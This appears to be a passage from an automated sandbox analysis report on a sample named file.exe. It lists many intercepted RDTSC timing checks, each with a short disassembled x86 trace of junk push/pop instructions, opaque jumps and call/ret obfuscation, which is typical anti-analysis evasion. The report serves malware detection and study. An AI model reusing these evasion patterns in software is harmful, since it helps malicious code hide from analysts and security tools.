                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 122F3C5 second address: 122F3D7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 jnc 00007F0790DC9730h 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1231393 second address: 1231398 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12304B1 second address: 12304CA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F0790D5812Ah 0x00000008 pushad 0x00000009 popad 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push eax 0x0000000f push edx 0x00000010 push ebx 0x00000011 push edx 0x00000012 pop edx 0x00000013 pop ebx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12304CA second address: 123055F instructions: 0x00000000 rdtsc 0x00000002 jo 00007F0790D580ACh 0x00000008 jns 00007F0790D580A6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 nop 0x00000011 push 00000000h 0x00000013 push ebp 0x00000014 call 00007F0790D580A8h 0x00000019 pop ebp 0x0000001a mov dword ptr [esp+04h], ebp 0x0000001e add dword ptr [esp+04h], 0000001Ah 0x00000026 inc ebp 0x00000027 push ebp 0x00000028 ret 0x00000029 pop ebp 0x0000002a ret 0x0000002b js 00007F0790D580AEh 0x00000031 js 00007F0790D580A8h 0x00000037 mov ebx, edx 0x00000039 push dword ptr fs:[00000000h] 0x00000040 mov dword ptr [ebp+122D1AF8h], eax 0x00000046 mov dword ptr fs:[00000000h], esp 0x0000004d jbe 00007F0790D580A9h 0x00000053 mov di, dx 0x00000056 mov eax, dword ptr [ebp+122D0F81h] 0x0000005c push 00000000h 0x0000005e push esi 0x0000005f call 00007F0790D580A8h 0x00000064 pop esi 0x00000065 mov dword ptr [esp+04h], esi 0x00000069 add dword ptr [esp+04h], 0000001Ah 0x00000071 inc esi 0x00000072 push esi 0x00000073 ret 0x00000074 pop esi 0x00000075 ret 0x00000076 push FFFFFFFFh 0x00000078 mov ebx, dword ptr [ebp+122D2C47h] 0x0000007e push eax 0x0000007f push eax 0x00000080 push edx 0x00000081 push eax 0x00000082 push edx 0x00000083 push eax 0x00000084 pop eax 0x00000085 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 123055F second address: 1230565 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1233450 second address: 1233454 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 12389D6 second address: 12389E0 instructions: 0x00000000 rdtsc 0x00000002 js 00007F0790D58126h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 12389E0 second address: 12389F8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jl 00007F0790D580A6h 0x00000009 jmp 00007F0790D580AAh 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 popad 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1235CC5 second address: 1235CC9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 123A277 second address: 123A27D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1235CC9 second address: 1235CD2 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ecx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 123AF13 second address: 123AF1D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 js 00007F0790D580A6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1236C90 second address: 1236D17 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 nop 0x00000006 push 00000000h 0x00000008 push edx 0x00000009 call 00007F0790D58128h 0x0000000e pop edx 0x0000000f mov dword ptr [esp+04h], edx 0x00000013 add dword ptr [esp+04h], 0000001Ah 0x0000001b inc edx 0x0000001c push edx 0x0000001d ret 0x0000001e pop edx 0x0000001f ret 0x00000020 pushad 0x00000021 movzx ecx, cx 0x00000024 popad 0x00000025 push dword ptr fs:[00000000h] 0x0000002c sub dword ptr [ebp+122D3793h], eax 0x00000032 mov dword ptr fs:[00000000h], esp 0x00000039 mov ebx, dword ptr [ebp+122D290Fh] 0x0000003f mov eax, dword ptr [ebp+122D140Dh] 0x00000045 push 00000000h 0x00000047 push eax 0x00000048 call 00007F0790D58128h 0x0000004d pop eax 0x0000004e mov dword ptr [esp+04h], eax 0x00000052 add dword ptr [esp+04h], 00000016h 0x0000005a inc eax 0x0000005b push eax 0x0000005c ret 0x0000005d pop eax 0x0000005e ret 0x0000005f sub dword ptr [ebp+122D28CDh], ebx 0x00000065 mov bx, di 0x00000068 push FFFFFFFFh 0x0000006a mov dword ptr [ebp+122D187Ch], esi 0x00000070 push eax 0x00000071 push eax 0x00000072 push edx 0x00000073 jp 00007F0790D58128h 0x00000079 push eax 0x0000007a pop eax 0x0000007b rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 123AF1D second address: 123AF21 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 123AF21 second address: 123AF54 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c jmp 00007F0790D58132h 0x00000011 jmp 00007F0790D58134h 0x00000016 popad 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 123AF54 second address: 123AF59 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 123BE4D second address: 123BE52 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 123BE52 second address: 123BE5C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnc 00007F0790D580A6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 123BE5C second address: 123BE79 instructions: 0x00000000 rdtsc 0x00000002 js 00007F0790D58126h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 jne 00007F0790D58126h 0x00000016 jne 00007F0790D58126h 0x0000001c popad 0x0000001d rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 123BE79 second address: 123BF00 instructions: 0x00000000 rdtsc 0x00000002 js 00007F0790D580A8h 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c nop 0x0000000d push 00000000h 0x0000000f push ebp 0x00000010 call 00007F0790D580A8h 0x00000015 pop ebp 0x00000016 mov dword ptr [esp+04h], ebp 0x0000001a add dword ptr [esp+04h], 0000001Bh 0x00000022 inc ebp 0x00000023 push ebp 0x00000024 ret 0x00000025 pop ebp 0x00000026 ret 0x00000027 push 00000000h 0x00000029 push 00000000h 0x0000002b push 00000000h 0x0000002d push edx 0x0000002e call 00007F0790D580A8h 0x00000033 pop edx 0x00000034 mov dword ptr [esp+04h], edx 0x00000038 add dword ptr [esp+04h], 00000017h 0x00000040 inc edx 0x00000041 push edx 0x00000042 ret 0x00000043 pop edx 0x00000044 ret 0x00000045 jmp 00007F0790D580B8h 0x0000004a push eax 0x0000004b push eax 0x0000004c push edx 0x0000004d jmp 00007F0790D580B9h 0x00000052 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 123BF00 second address: 123BF06 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 123D013 second address: 123D029 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0790D580AEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c pop eax 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 123D029 second address: 123D0BB instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 je 00007F0790D58138h 0x0000000e pushad 0x0000000f push ecx 0x00000010 pop ecx 0x00000011 jmp 00007F0790D5812Eh 0x00000016 popad 0x00000017 nop 0x00000018 sub edi, dword ptr [ebp+122D30A6h] 0x0000001e push dword ptr fs:[00000000h] 0x00000025 mov dword ptr [ebp+122D3035h], eax 0x0000002b mov dword ptr fs:[00000000h], esp 0x00000032 mov dword ptr [ebp+12464DC9h], ecx 0x00000038 mov eax, dword ptr [ebp+122D142Dh] 0x0000003e sbb edi, 3A94060Ah 0x00000044 push FFFFFFFFh 0x00000046 push 00000000h 0x00000048 push eax 0x00000049 call 00007F0790D58128h 0x0000004e pop eax 0x0000004f mov dword ptr [esp+04h], eax 0x00000053 add dword ptr [esp+04h], 00000018h 0x0000005b inc eax 0x0000005c push eax 0x0000005d ret 0x0000005e pop eax 0x0000005f ret 0x00000060 jng 00007F0790D5812Ch 0x00000066 add edi, 6BC83A53h 0x0000006c nop 0x0000006d jmp 00007F0790D58130h 0x00000072 push eax 0x00000073 push eax 0x00000074 push edx 0x00000075 push ecx 0x00000076 push eax 0x00000077 push edx 0x00000078 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 123D0BB second address: 123D0C0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 123E043 second address: 123E048 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 123E048 second address: 123E0F3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 je 00007F0790D580A6h 0x00000009 jmp 00007F0790D580B9h 0x0000000e popad 0x0000000f pop edx 0x00000010 pop eax 0x00000011 mov dword ptr [esp], eax 0x00000014 push 00000000h 0x00000016 push ebp 0x00000017 call 00007F0790D580A8h 0x0000001c pop ebp 0x0000001d mov dword ptr [esp+04h], ebp 0x00000021 add dword ptr [esp+04h], 00000014h 0x00000029 inc ebp 0x0000002a push ebp 0x0000002b ret 0x0000002c pop ebp 0x0000002d ret 0x0000002e xor di, E627h 0x00000033 push dword ptr fs:[00000000h] 0x0000003a xor dword ptr [ebp+122D28B7h], edi 0x00000040 mov dword ptr fs:[00000000h], esp 0x00000047 push 00000000h 0x00000049 push eax 0x0000004a call 00007F0790D580A8h 0x0000004f pop eax 0x00000050 mov dword ptr [esp+04h], eax 0x00000054 add dword ptr [esp+04h], 00000019h 0x0000005c inc eax 0x0000005d push eax 0x0000005e ret 0x0000005f pop eax 0x00000060 ret 0x00000061 sub dword ptr [ebp+122D2E1Ch], eax 0x00000067 mov eax, dword ptr [ebp+122D03D5h] 0x0000006d or dword ptr [ebp+122D2E16h], ecx 0x00000073 push FFFFFFFFh 0x00000075 jmp 00007F0790D580B4h 0x0000007a nop 0x0000007b pushad 0x0000007c pushad 0x0000007d push eax 0x0000007e push edx 0x0000007f rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1241B73 second address: 1241B7F instructions: 0x00000000 rdtsc 0x00000002 jo 00007F0790D58126h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 12444E3 second address: 12444E7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 12444E7 second address: 12444EB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 12444EB second address: 12444F4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 12444F4 second address: 12444FA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 11DCF8B second address: 11DCF9B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jg 00007F0790D580A6h 0x0000000a jp 00007F0790D580A6h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1247258 second address: 1247262 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007F0790D58126h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1247262 second address: 1247266 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1247266 second address: 124726E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 124726E second address: 1247273 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1247273 second address: 12472AD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007F0790D58126h 0x0000000a jo 00007F0790D58126h 0x00000010 jmp 00007F0790D5812Fh 0x00000015 popad 0x00000016 push eax 0x00000017 jno 00007F0790D58126h 0x0000001d pop eax 0x0000001e pop edx 0x0000001f pop eax 0x00000020 pushad 0x00000021 push edi 0x00000022 pushad 0x00000023 popad 0x00000024 pop edi 0x00000025 jo 00007F0790D58128h 0x0000002b pushad 0x0000002c popad 0x0000002d push eax 0x0000002e push eax 0x0000002f push edx 0x00000030 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 12472AD second address: 12472B3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 12473F0 second address: 12473F6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 12473F6 second address: 1247407 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007F0790D580A6h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1247407 second address: 124740B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 11E3AD5 second address: 11E3AF2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F0790D580ADh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push ebx 0x0000000e pop ebx 0x0000000f jno 00007F0790D580A6h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 11E3AF2 second address: 11E3AF8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 11E3AF8 second address: 11E3B08 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 pop eax 0x00000005 push edi 0x00000006 pop edi 0x00000007 pop edx 0x00000008 push eax 0x00000009 push edx 0x0000000a jl 00007F0790D580A6h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 11E3B08 second address: 11E3B3A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0790D58134h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F0790D58130h 0x00000014 push eax 0x00000015 push edx 0x00000016 push ebx 0x00000017 pop ebx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 11E3B3A second address: 11E3B3E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 11E3B3E second address: 11E3B44 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 11E3B44 second address: 11E3B4A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 11E3B4A second address: 11E3B59 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F0790D5812Ah 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 11E3B59 second address: 11E3B5F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 11E3B5F second address: 11E3B6D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jbe 00007F0790D58126h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 124C221 second address: 124C225 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 124C225 second address: 124C229 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 124C229 second address: 124C235 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007F0790D580A6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 124F5E9 second address: 124F5ED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 124F5ED second address: 124F5F3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1254011 second address: 1254048 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pushad 0x00000006 jmp 00007F0790D58130h 0x0000000b jmp 00007F0790D58132h 0x00000010 push esi 0x00000011 pop esi 0x00000012 jmp 00007F0790D5812Ch 0x00000017 popad 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1254048 second address: 1254050 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 push edi 0x00000007 pop edi 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1254050 second address: 1254064 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jbe 00007F0790D58128h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e pushad 0x0000000f push eax 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1254064 second address: 125406E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop eax 0x00000007 push ebx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1254801 second address: 1254807 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1254807 second address: 1254824 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jc 00007F0790D580AEh 0x0000000c jns 00007F0790D580A6h 0x00000012 pushad 0x00000013 popad 0x00000014 popad 0x00000015 push eax 0x00000016 push edx 0x00000017 push eax 0x00000018 push edx 0x00000019 push ecx 0x0000001a pop ecx 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1254824 second address: 1254828 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1254828 second address: 1254832 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F0790D580A6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1254E3B second address: 1254E40 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1255220 second address: 1255225 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 125A8C9 second address: 125A8E1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pushad 0x00000006 je 00007F0790D58126h 0x0000000c pushad 0x0000000d popad 0x0000000e jng 00007F0790D58126h 0x00000014 popad 0x00000015 pushad 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 125A8E1 second address: 125A8EF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push edx 0x00000007 pop edx 0x00000008 pushad 0x00000009 popad 0x0000000a popad 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 11DE981 second address: 11DE998 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0790D58131h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 12596EF second address: 12596F5 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 125998F second address: 125999E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 js 00007F0790D5812Eh 0x0000000b push esi 0x0000000c pop esi 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 125999E second address: 12599C2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 jmp 00007F0790D580B8h 0x0000000b jnl 00007F0790D580A6h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1259C86 second address: 1259CA6 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pushad 0x00000004 popad 0x00000005 pop ecx 0x00000006 push ecx 0x00000007 jmp 00007F0790D5812Bh 0x0000000c push ecx 0x0000000d pop ecx 0x0000000e pop ecx 0x0000000f pop edx 0x00000010 pop eax 0x00000011 jne 00007F0790D58134h 0x00000017 push edi 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1259CA6 second address: 1259CAC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1259DF3 second address: 1259DF7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1259DF7 second address: 1259DFD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1259DFD second address: 1259E1D instructions: 0x00000000 rdtsc 0x00000002 jp 00007F0790D5812Ah 0x00000008 push esi 0x00000009 jmp 00007F0790D5812Bh 0x0000000e pop esi 0x0000000f pop edx 0x00000010 pop eax 0x00000011 pushad 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1259E1D second address: 1259E23 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1259E23 second address: 1259E33 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F0790D58126h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1259E33 second address: 1259E37 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 125945B second address: 1259461 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 125E328 second address: 125E32E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 125E32E second address: 125E332 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
